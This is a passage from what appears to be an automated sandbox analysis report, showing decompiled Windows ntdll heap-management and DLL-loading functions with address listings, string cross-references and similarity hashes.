								_push( &_v12);
								_push(0xffffffff);
								_t131 = E010B96E0();
							}
						}
						_t89 =  *[fs:0x30];
						__eflags = _t131;
						if(_t131 < 0) {
							__eflags =  *(_t89 + 0xc);
							if( *(_t89 + 0xc) == 0) {
								_push("HEAP: ");
								E0107B150();
							} else {
								E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t149);
							_t75 = E0107B150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
							goto L4;
						} else {
							_t96 =  *(_t89 + 0x50);
							_t132 = 0x7ffe0380;
							__eflags = _t96;
							if(_t96 != 0) {
								__eflags =  *_t96;
								if( *_t96 == 0) {
									goto L10;
								}
								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
								L11:
								__eflags =  *_t97;
								if( *_t97 != 0) {
									_t98 =  *[fs:0x30];
									__eflags =  *(_t98 + 0x240) & 0x00000001;
									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
										E011314FB(_t132, _t149, _v12, _v8, 7);
									}
								}
								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
								_t101 =  *( *[fs:0x30] + 0x50);
								__eflags = _t101;
								if(_t101 != 0) {
									__eflags =  *_t101;
									if( *_t101 == 0) {
										goto L13;
									}
									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
									goto L14;
								} else {
									L13:
									_t102 = _t132;
									L14:
									__eflags =  *_t102;
									if( *_t102 != 0) {
										_t103 =  *[fs:0x30];
										__eflags =  *(_t103 + 0x240) & 0x00000001;
										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
											__eflags = E01097D50();
											if(__eflags != 0) {
												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
											}
											E01131411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
										}
									}
									_t133 = 0x7ffe038a;
									_t105 =  *( *[fs:0x30] + 0x50);
									__eflags = _t105;
									if(_t105 != 0) {
										__eflags =  *_t105;
										if( *_t105 == 0) {
											goto L16;
										}
										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
										goto L17;
									} else {
										L16:
										_t106 = _t133;
										L17:
										__eflags =  *_t106;
										if( *_t106 != 0) {
											__eflags = E01097D50();
											if(__eflags != 0) {
												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
											}
											E01131411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
										}
										_t75 = _t150[1] & 0x00000013 | 0x00000008;
										_t150[1] = _t75;
										goto L4;
									}
								}
							}
							L10:
							_t97 = _t132;
							goto L11;
						}
					} else {
						goto L4;
					}
				}
			}






















                                                                            0x010aac85
                                                                            0x010aac88
                                                                            0x010aac8a
                                                                            0x010aac8d
                                                                            0x010aac91
                                                                            0x010aac99
                                                                            0x010aac9c
                                                                            0x010e9f57
                                                                            0x010e9f5b
                                                                            0x010e9f60
                                                                            0x010e9f60
                                                                            0x010aaca8
                                                                            0x010aacae
                                                                            0x010aacda
                                                                            0x010aacde
                                                                            0x010aace8
                                                                            0x010aaceb
                                                                            0x010aacee
                                                                            0x00000000
                                                                            0x010aacee
                                                                            0x010aacf6
                                                                            0x010aacb0
                                                                            0x010aacb0
                                                                            0x010aacbb
                                                                            0x010aacbd
                                                                            0x010aacc0
                                                                            0x010aacc5
                                                                            0x010aadae
                                                                            0x010aadb4
                                                                            0x010aadb4
                                                                            0x010aacd4
                                                                            0x010aacd8
                                                                            0x010aacf9
                                                                            0x010aacff
                                                                            0x010aad04
                                                                            0x010aad08
                                                                            0x010aad09
                                                                            0x010aad10
                                                                            0x010aad12
                                                                            0x010aad18
                                                                            0x010e9f6f
                                                                            0x010e9f74
                                                                            0x010e9f76
                                                                            0x010e9f7c
                                                                            0x010e9f84
                                                                            0x010e9f88
                                                                            0x010e9f89
                                                                            0x010e9f90
                                                                            0x010e9f90
                                                                            0x010e9f76
                                                                            0x010aad1e
                                                                            0x010aad24
                                                                            0x010aad26
                                                                            0x010ea097
                                                                            0x010ea09b
                                                                            0x010ea0ba
                                                                            0x010ea0bf
                                                                            0x010ea09d
                                                                            0x010ea0b2
                                                                            0x010ea0b7
                                                                            0x010ea0c5
                                                                            0x010ea0c8
                                                                            0x010ea0cb
                                                                            0x010ea0d2
                                                                            0x00000000
                                                                            0x010aad2c
                                                                            0x010aad2c
                                                                            0x010aad2f
                                                                            0x010aad34
                                                                            0x010aad36
                                                                            0x010e9f97
                                                                            0x010e9f9a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e9fa9
                                                                            0x010aad3e
                                                                            0x010aad3e
                                                                            0x010aad41
                                                                            0x010e9fb3
                                                                            0x010e9fb9
                                                                            0x010e9fc0
                                                                            0x010e9fd0
                                                                            0x010e9fd0
                                                                            0x010e9fc0
                                                                            0x010aad4a
                                                                            0x010aad50
                                                                            0x010aad5c
                                                                            0x010aad62
                                                                            0x010aad68
                                                                            0x010aad6b
                                                                            0x010aad6d
                                                                            0x010e9fda
                                                                            0x010e9fdd
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e9fec
                                                                            0x00000000
                                                                            0x010aad73
                                                                            0x010aad73
                                                                            0x010aad73
                                                                            0x010aad75
                                                                            0x010aad75
                                                                            0x010aad78
                                                                            0x010e9ff6
                                                                            0x010e9ffc
                                                                            0x010ea003
                                                                            0x010ea00e
                                                                            0x010ea010
                                                                            0x010ea01b
                                                                            0x010ea01b
                                                                            0x010ea01b
                                                                            0x010ea038
                                                                            0x010ea038
                                                                            0x010ea003
                                                                            0x010aad84
                                                                            0x010aad89
                                                                            0x010aad8c
                                                                            0x010aad8e
                                                                            0x010ea042
                                                                            0x010ea045
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010ea054
                                                                            0x00000000
                                                                            0x010aad94
                                                                            0x010aad94
                                                                            0x010aad94
                                                                            0x010aad96
                                                                            0x010aad96
                                                                            0x010aad99
                                                                            0x010ea063
                                                                            0x010ea065
                                                                            0x010ea070
                                                                            0x010ea070
                                                                            0x010ea070
                                                                            0x010ea08d
                                                                            0x010ea08d
                                                                            0x010aada4
                                                                            0x010aada6
                                                                            0x00000000
                                                                            0x010aada6
                                                                            0x010aad8e
                                                                            0x010aad6d
                                                                            0x010aad3c
                                                                            0x010aad3c
                                                                            0x00000000
                                                                            0x010aad3c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010aacd8

                                                                            Strings
                                                                            • HEAP: , xrefs: 010EA0BA
                                                                            • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 010EA0CD
                                                                            • HEAP[%wZ]: , xrefs: 010EA0AD
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                            • API String ID: 0-1340214556
                                                                            • Opcode ID: bb0f1ed98a1b56965d770b172184e1116e82c7c947c99d94bd0da03b63dfcf37
                                                                            • Instruction ID: af7c8cd14edbbb4ec655767d6673609bd76cef529f42ef34f10bc1872ce41d29
                                                                            • Opcode Fuzzy Hash: bb0f1ed98a1b56965d770b172184e1116e82c7c947c99d94bd0da03b63dfcf37
                                                                            • Instruction Fuzzy Hash: 9781F731704684EFE726DBA8C888BAABBF4FF09714F0441A5E5D28B6D2D774E940CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0109B73D, Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 74%
                                                                            			E0109B73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t72;
				char _t76;
				signed char _t77;
				intOrPtr* _t80;
				unsigned int _t85;
				signed int* _t86;
				signed int _t88;
				signed char _t89;
				intOrPtr _t90;
				intOrPtr _t101;
				intOrPtr* _t111;
				void* _t117;
				intOrPtr* _t118;
				signed int _t120;
				signed char _t121;
				intOrPtr* _t123;
				signed int _t126;
				intOrPtr _t136;
				signed int _t139;
				void* _t140;
				signed int _t141;
				void* _t147;

				_t111 = _a4;
				_t140 = __ecx;
				_v8 = __edx;
				_t3 = _t111 + 0x18; // 0x0
				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
				_t5 = _t111 - 8; // -32
				_t141 = _t5;
				 *(_t111 + 0x14) = _a8;
				_t72 = 4;
				 *(_t141 + 2) = 1;
				 *_t141 = _t72;
				 *((char*)(_t141 + 7)) = 3;
				_t134 =  *((intOrPtr*)(__edx + 0x18));
				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
					_t76 = (_t141 - __edx >> 0x10) + 1;
					_v12 = _t76;
					__eflags = _t76 - 0xfe;
					if(_t76 >= 0xfe) {
						_push(__edx);
						_push(0);
						E0113A80D(_t134, 3, _t141, __edx);
						_t76 = _v12;
					}
				} else {
					_t76 = 0;
				}
				 *((char*)(_t141 + 6)) = _t76;
				if( *0x1168748 >= 1) {
					__eflags = _a12 - _t141;
					if(_a12 <= _t141) {
						goto L4;
					}
					_t101 =  *[fs:0x30];
					__eflags =  *(_t101 + 0xc);
					if( *(_t101 + 0xc) == 0) {
						_push("HEAP: ");
						E0107B150();
					} else {
						E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
					E0107B150();
					__eflags =  *0x1167bc8;
					if(__eflags == 0) {
						E01132073(_t111, 1, _t140, __eflags);
					}
					goto L3;
				} else {
					L3:
					_t147 = _a12 - _t141;
					L4:
					if(_t147 != 0) {
						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
					}
					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
					}
					_t135 =  *(_t111 + 0x14);
					if( *(_t111 + 0x14) == 0) {
						L12:
						_t77 =  *((intOrPtr*)(_t141 + 6));
						if(_t77 != 0) {
							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
						} else {
							_t117 = _t140;
						}
						_t118 = _t117 + 0x38;
						_t26 = _t111 + 8; // -16
						_t80 = _t26;
						_t136 =  *_t118;
						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
							_push(_t118);
							_push(0);
							E0113A80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
						} else {
							 *_t80 = _t136;
							 *((intOrPtr*)(_t80 + 4)) = _t118;
							 *((intOrPtr*)(_t136 + 4)) = _t80;
							 *_t118 = _t80;
						}
						_t120 = _v8;
						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
							__eflags =  *(_t140 + 0xb8);
							if( *(_t140 + 0xb8) == 0) {
								_t88 =  *(_t140 + 0x40) & 0x00000003;
								__eflags = _t88 - 2;
								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
								__eflags =  *0x1168720 & 0x00000001;
								_t89 = _t88 & 0xffffff00 | ( *0x1168720 & 0x00000001) == 0x00000000;
								__eflags = _t89 & _t121;
								if((_t89 & _t121) != 0) {
									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
								}
							}
						}
						_t85 =  *(_t111 + 0x14);
						if(_t85 >= 0x7f000) {
							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
						}
						_t86 = _a16;
						 *_t86 = _t141 - _a12 >> 3;
						return _t86;
					} else {
						_t90 = E0109B8E4(_t135);
						_t123 =  *((intOrPtr*)(_t90 + 4));
						if( *_t123 != _t90) {
							_push(_t123);
							_push( *_t123);
							E0113A80D(0, 0xd, _t90, 0);
						} else {
							 *_t111 = _t90;
							 *((intOrPtr*)(_t111 + 4)) = _t123;
							 *_t123 = _t111;
							 *((intOrPtr*)(_t90 + 4)) = _t111;
						}
						_t139 =  *(_t140 + 0xb8);
						if(_t139 != 0) {
							_t93 =  *(_t111 + 0x14) >> 0xc;
							__eflags = _t93;
							while(1) {
								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
									break;
								}
								_t126 =  *_t139;
								__eflags = _t126;
								if(_t126 != 0) {
									_t139 = _t126;
									continue;
								}
								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
								break;
							}
							E0109E4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
						}
						goto L12;
					}
				}
			}






























                                                                            0x0109b746
                                                                            0x0109b74b
                                                                            0x0109b74d
                                                                            0x0109b750
                                                                            0x0109b755
                                                                            0x0109b758
                                                                            0x0109b758
                                                                            0x0109b75e
                                                                            0x0109b763
                                                                            0x0109b764
                                                                            0x0109b76a
                                                                            0x0109b76d
                                                                            0x0109b771
                                                                            0x0109b776
                                                                            0x0109b85c
                                                                            0x0109b85d
                                                                            0x0109b860
                                                                            0x0109b865
                                                                            0x010e2ba1
                                                                            0x010e2ba2
                                                                            0x010e2ba9
                                                                            0x010e2bae
                                                                            0x010e2bae
                                                                            0x0109b77c
                                                                            0x0109b77c
                                                                            0x0109b77c
                                                                            0x0109b785
                                                                            0x0109b788
                                                                            0x010e2bb6
                                                                            0x010e2bb9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e2bbf
                                                                            0x010e2bc5
                                                                            0x010e2bc9
                                                                            0x010e2be8
                                                                            0x010e2bed
                                                                            0x010e2bcb
                                                                            0x010e2be0
                                                                            0x010e2be5
                                                                            0x010e2bf3
                                                                            0x010e2bf8
                                                                            0x010e2bfd
                                                                            0x010e2c05
                                                                            0x010e2c0e
                                                                            0x010e2c0e
                                                                            0x00000000
                                                                            0x0109b78e
                                                                            0x0109b78e
                                                                            0x0109b78e
                                                                            0x0109b791
                                                                            0x0109b791
                                                                            0x0109b797
                                                                            0x0109b797
                                                                            0x0109b79f
                                                                            0x0109b7a9
                                                                            0x0109b7af
                                                                            0x0109b7af
                                                                            0x0109b7b1
                                                                            0x0109b7b6
                                                                            0x0109b7e2
                                                                            0x0109b7e2
                                                                            0x0109b7e7
                                                                            0x0109b880
                                                                            0x0109b7ed
                                                                            0x0109b7ed
                                                                            0x0109b7ed
                                                                            0x0109b7ef
                                                                            0x0109b7f2
                                                                            0x0109b7f2
                                                                            0x0109b7f5
                                                                            0x0109b7fa
                                                                            0x010e2c2d
                                                                            0x010e2c2e
                                                                            0x010e2c39
                                                                            0x0109b800
                                                                            0x0109b800
                                                                            0x0109b802
                                                                            0x0109b805
                                                                            0x0109b808
                                                                            0x0109b808
                                                                            0x0109b80a
                                                                            0x0109b80d
                                                                            0x0109b816
                                                                            0x0109b81c
                                                                            0x0109b822
                                                                            0x0109b82f
                                                                            0x0109b88b
                                                                            0x0109b892
                                                                            0x0109b897
                                                                            0x0109b899
                                                                            0x0109b89b
                                                                            0x0109b89e
                                                                            0x0109b8a5
                                                                            0x0109b8a8
                                                                            0x0109b8aa
                                                                            0x0109b8ac
                                                                            0x0109b8ac
                                                                            0x0109b8aa
                                                                            0x0109b892
                                                                            0x0109b831
                                                                            0x0109b839
                                                                            0x0109b83b
                                                                            0x0109b83b
                                                                            0x0109b844
                                                                            0x0109b84b
                                                                            0x0109b852
                                                                            0x0109b7b8
                                                                            0x0109b7ba
                                                                            0x0109b7bf
                                                                            0x0109b7c4
                                                                            0x010e2c18
                                                                            0x010e2c19
                                                                            0x010e2c23
                                                                            0x0109b7ca
                                                                            0x0109b7ca
                                                                            0x0109b7cc
                                                                            0x0109b7cf
                                                                            0x0109b7d1
                                                                            0x0109b7d1
                                                                            0x0109b7d4
                                                                            0x0109b7dc
                                                                            0x0109b8bb
                                                                            0x0109b8bb
                                                                            0x0109b8be
                                                                            0x0109b8be
                                                                            0x0109b8c1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0109b8c3
                                                                            0x0109b8c5
                                                                            0x0109b8c7
                                                                            0x0109b8e0
                                                                            0x00000000
                                                                            0x0109b8e0
                                                                            0x0109b8cc
                                                                            0x0109b8cc
                                                                            0x00000000
                                                                            0x0109b8cc
                                                                            0x0109b8d6
                                                                            0x0109b8d6
                                                                            0x00000000
                                                                            0x0109b7dc
                                                                            0x0109b7b6

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 0-1334570610
                                                                            • Opcode ID: 8cfc66ce6423d0e2ae095b784d01e6cd3eabf4587101b4ad37984855949b6736
                                                                            • Instruction ID: d99fdae4a58b6aa2e764eb845f4caf2792d65605c5360199c85e5cc89f8b87ef
                                                                            • Opcode Fuzzy Hash: 8cfc66ce6423d0e2ae095b784d01e6cd3eabf4587101b4ad37984855949b6736
                                                                            • Instruction Fuzzy Hash: 0861DF306002019FDB68CF28D494BAABBE5FF44324F1885ADE8898F255D730E891DB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01087E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 98%
                                                                            			E01087E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0108CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0107C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1165780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E010F5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1165780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E01097D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01097D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E010F7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E01097D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01097D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E010F7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E010AA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0107B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                                            0x01087e4c
                                                                            0x01087e50
                                                                            0x01087e55
                                                                            0x01087e58
                                                                            0x01087e5d
                                                                            0x01087e71
                                                                            0x01087f33
                                                                            0x01087e77
                                                                            0x01087e77
                                                                            0x01087e79
                                                                            0x01087e79
                                                                            0x01087e7e
                                                                            0x01087f45
                                                                            0x010d9848
                                                                            0x00000000
                                                                            0x010d9848
                                                                            0x01087f4e
                                                                            0x01087f53
                                                                            0x01087f5a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010d985a
                                                                            0x010d9862
                                                                            0x010d9866
                                                                            0x00000000
                                                                            0x010d986c
                                                                            0x00000000
                                                                            0x010d986c
                                                                            0x01087e84
                                                                            0x01087e84
                                                                            0x01087e8d
                                                                            0x010d9871
                                                                            0x01087eb8
                                                                            0x01087ec0
                                                                            0x01087ec0
                                                                            0x01087e9a
                                                                            0x010d987e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010d9884
                                                                            0x010d988b
                                                                            0x010d98a7
                                                                            0x010d98ac
                                                                            0x010d98b1
                                                                            0x010d98b6
                                                                            0x010d98b8
                                                                            0x010d98b8
                                                                            0x010d98b9
                                                                            0x00000000
                                                                            0x010d98b9
                                                                            0x01087ea0
                                                                            0x01087ea7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01087eac
                                                                            0x01087eb1
                                                                            0x01087ec6
                                                                            0x01087ed0
                                                                            0x010d98cc
                                                                            0x01087ed6
                                                                            0x01087ed6
                                                                            0x01087ed6
                                                                            0x01087ede
                                                                            0x01087ee3
                                                                            0x010d98e3
                                                                            0x010d98f0
                                                                            0x010d9902
                                                                            0x010d98f2
                                                                            0x010d98fb
                                                                            0x010d98fb
                                                                            0x010d9907
                                                                            0x010d991d
                                                                            0x010d991d
                                                                            0x010d9907
                                                                            0x010d98e3
                                                                            0x01087ef0
                                                                            0x01087f14
                                                                            0x01087f14
                                                                            0x01087f1e
                                                                            0x010d9946
                                                                            0x01087f24
                                                                            0x01087f24
                                                                            0x01087f24
                                                                            0x01087f2c
                                                                            0x010d996a
                                                                            0x010d9975
                                                                            0x010d9975
                                                                            0x010d997e
                                                                            0x010d9993
                                                                            0x010d9993
                                                                            0x010d997e
                                                                            0x00000000
                                                                            0x01087ef2
                                                                            0x01087efc
                                                                            0x01087f0a
                                                                            0x01087f0e
                                                                            0x010d9933
                                                                            0x00000000
                                                                            0x010d9933
                                                                            0x00000000
                                                                            0x01087f0e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01087eb1

                                                                            Strings
                                                                            • LdrpCompleteMapModule, xrefs: 010D9898
                                                                            • minkernel\ntdll\ldrmap.c, xrefs: 010D98A2
                                                                            • Could not validate the crypto signature for DLL %wZ, xrefs: 010D9891
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                            • API String ID: 0-1676968949
                                                                            • Opcode ID: 48198f9ad9265b18d12d2db3da037515bdac354148beec98b5783d948b62b3a7
                                                                            • Instruction ID: 1669b7f1b1fc0adcc20f994e0783bd970f0c0f687cb4a5fd4861f05510c6bfbd
                                                                            • Opcode Fuzzy Hash: 48198f9ad9265b18d12d2db3da037515bdac354148beec98b5783d948b62b3a7
                                                                            • Instruction Fuzzy Hash: 6E513531608742DBEB62EB5CC984B6ABBE0EF04714F2405A9E9D19B7D6C730ED00CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 011223E3, Relevance: 3.9, Strings: 3, Instructions: 166COMMONCrypto
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 64%
                                                                            			E011223E3(signed int __ecx, unsigned int __edx) {
				intOrPtr _v8;
				intOrPtr _t42;
				char _t43;
				signed short _t44;
				signed short _t48;
				signed char _t51;
				signed short _t52;
				intOrPtr _t54;
				signed short _t64;
				signed short _t66;
				intOrPtr _t69;
				signed short _t73;
				signed short _t76;
				signed short _t77;
				signed short _t79;
				void* _t83;
				signed int _t84;
				signed int _t85;
				signed char _t94;
				unsigned int _t99;
				unsigned int _t104;
				signed int _t108;
				void* _t110;
				void* _t111;
				unsigned int _t114;

				_t84 = __ecx;
				_push(__ecx);
				_t114 = __edx;
				_t42 =  *((intOrPtr*)(__edx + 7));
				if(_t42 == 1) {
					L49:
					_t43 = 1;
					L50:
					return _t43;
				}
				if(_t42 != 4) {
					if(_t42 >= 0) {
						if( *(__ecx + 0x4c) == 0) {
							_t44 =  *__edx & 0x0000ffff;
						} else {
							_t73 =  *__edx;
							if(( *(__ecx + 0x4c) & _t73) != 0) {
								_t73 = _t73 ^  *(__ecx + 0x50);
							}
							_t44 = _t73 & 0x0000ffff;
						}
					} else {
						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0x116874c ^ __ecx;
						if(_t104 == 0) {
							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
						} else {
							_t76 = 0;
						}
						_t44 =  *((intOrPtr*)(_t76 + 0x14));
					}
					_t94 =  *((intOrPtr*)(_t114 + 7));
					_t108 = _t44 & 0xffff;
					if(_t94 != 5) {
						if((_t94 & 0x00000040) == 0) {
							if((_t94 & 0x0000003f) == 0x3f) {
								if(_t94 >= 0) {
									if( *(_t84 + 0x4c) == 0) {
										_t48 =  *_t114 & 0x0000ffff;
									} else {
										_t66 =  *_t114;
										if(( *(_t84 + 0x4c) & _t66) != 0) {
											_t66 = _t66 ^  *(_t84 + 0x50);
										}
										_t48 = _t66 & 0x0000ffff;
									}
								} else {
									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0x116874c ^ _t84;
									if(_t99 == 0) {
										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
									} else {
										_t69 = 0;
									}
									_t48 =  *((intOrPtr*)(_t69 + 0x14));
								}
								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
							} else {
								_t85 = _t94 & 0x3f;
							}
						} else {
							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
						}
					} else {
						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
					}
					_t110 = (_t108 << 3) - _t85;
				} else {
					if( *(__ecx + 0x4c) == 0) {
						_t77 =  *__edx & 0x0000ffff;
					} else {
						_t79 =  *__edx;
						if(( *(__ecx + 0x4c) & _t79) != 0) {
							_t79 = _t79 ^  *(__ecx + 0x50);
						}
						_t77 = _t79 & 0x0000ffff;
					}
					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
				}
				_t51 =  *((intOrPtr*)(_t114 + 7));
				if(_t51 != 5) {
					if((_t51 & 0x00000040) == 0) {
						_t52 = 0;
						goto L42;
					}
